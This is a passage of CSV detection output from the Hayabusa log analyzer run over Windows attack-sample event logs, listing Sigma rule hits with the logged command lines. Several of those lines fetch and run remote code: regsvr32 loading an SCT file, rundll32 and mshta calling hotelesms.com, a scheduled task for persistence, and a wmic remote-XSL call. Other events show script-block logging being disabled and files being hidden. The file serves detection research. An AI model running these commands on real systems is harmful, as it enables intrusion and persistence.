Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.786 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:18.833 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:18.833 +09:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,../hayabusa-rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx 2019-05-19 02:50:36.889 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx 2019-05-19 02:51:14.254 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx 2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx 2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx 2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx 2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx 2019-05-20 03:05:07.719 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx 2019-05-20 03:05:33.454 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx 2019-05-21 09:35:07.308 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.463 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.463 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.518 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:07.870 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:08.279 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 365ABB72-47BC-5CE3-0000-001044EE3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:10.161 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 365ABB72-47BE-5CE3-0000-0010CF0C3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-21 09:35:12.705 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.286 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.867 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.389 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.769 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 365ABB72-1A2B-5CE4-0000-00102F502201",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:32:59.809 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:33:00.140 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 00:33:01.141 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx 2019-05-22 13:02:11.307 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | LID: 0xf05d | PID: 2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx 2019-05-22 13:02:11.307 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx 2019-05-24 01:49:05.736 +09:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:05.862 